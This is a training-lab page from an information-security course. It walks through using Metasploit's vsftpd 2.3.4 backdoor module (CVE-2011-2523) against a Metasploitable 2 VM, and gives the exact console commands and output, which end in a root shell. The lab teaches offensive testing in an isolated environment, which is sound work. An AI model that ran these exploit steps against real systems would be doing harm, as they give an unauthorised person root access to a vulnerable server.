InfoSecLabs
  • Information Security Labs
  • Cryptography
    • Introduction to OpenSSL/LibreSSL
    • Symmetric cryptography
    • Asymmetric cryptography
    • Hashes and Message Authentication Codes
    • Elliptic Curve Cryptography
    • Diffie-Hellman (DH)
    • Digital Signatures
    • Digital Certificates
    • S/MIME
    • OCSP - Online Certificate Status Protocol
    • SSL/TLS
  • Passwords
    • Understanding and attacking password-based systems
    • THC-Hydra
    • John the Ripper
    • Hashcat
  • Vulnerability Testing
    • Introduction to vulnerability testing
    • Reconnaissance and Footprinting
      • OSINT
      • Maltego
      • Recon-ng
      • theHarvester
      • dmitry
    • Scanning and Enumeration
      • Nmap
      • Hping3
    • Vulnerability Identification and Analysis
      • OpenVAS
        • OpenVAS Architecture
        • Installing OpenVAS on Kali Linux
        • Starting and Stopping OpenVAS
        • Navigating through OpenVAS
        • Scanning a target
      • Nessus
  • Vulnerability Exploitation
    • About the Metasploit Framework
    • Basics of Metasploit Framework
    • Exploitation with Metasploit Framework
      • vsftp Backdoor Vulnerability [CVE-2011-2523]
      • UnrealIRCd backdoor [CVE-2010-2075]
      • distCC RCE [CVE-2004-2687]
      • Java RMI Server Insecure Default Configuration RCE Vulnerability
      • VNC Brute Force Login
      • MySQL / MariaDB Default Credentials (MySQL Protocol)
      • SAMBA (Samba “username map script” Command Execution)
      • Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)
      • Apache (CGI Argument Injection)
      • Windows Eternalblue [CVE-2017-143,144,145,146,148]
    • Create payload to exploit users
  • Application Security
    • DVWA - Damn Vulnerable Web Application
      • Introduction
      • Setup
      • Web Apps Vulnerability Testing
        • Brute-Force
        • Command Injection
        • File inclusion
        • File upload
        • SQL Injection
        • SQL Injection (Blind)
        • XSS (Reflected)
        • XSS (Stored)
  • Social Engineering
Powered by GitBook
On this page
  • vsftp Backdoor Vulnerability [CVE-2011-2523]
  • Requirements
  • Laboratory Workflow
  • Video
  • Questions
  1. Vulnerability Exploitation
  2. Exploitation with Metasploit Framework

vsftp Backdoor Vulnerability [CVE-2011-2523]

vsftp Backdoor Vulnerability [CVE-2011-2523]

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Requirements

Kali Linux
The Kali Linux VM (or any other type of installation)

Metaploitable 2

The Metasploitable 2 VM

Metasploitable Framework

Metasploit Framework toolset (installed on Kali Linux by default)

Metasploitable 2 IP

The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Search for the appropriate module

search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

3. Use the module

use exploit/unix/ftp/vsftpd_234_backdoor

4. Check the module options

options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

5. Set the appropriate options

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

6. Run the exploit

exploit

[*] 192.168.8.142:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.8.142:21 - USER: 331 Please specify the password.
[+] 192.168.8.142:21 - Backdoor service has been spawned, handling...
[+] 192.168.8.142:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.8.147:44153 -> 192.168.8.142:6200) at 2023-03-28 06:45:59 -0400

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

  1. Now, what can I do with the exploitation achieved?

  2. Which type of privileges do I have on the exploited target?

  3. How was this accomplished?

  4. Try to learn more about this vulnerability.

PreviousExploitation with Metasploit FrameworkNextUnrealIRCd backdoor [CVE-2010-2075]

Last updated 1 year ago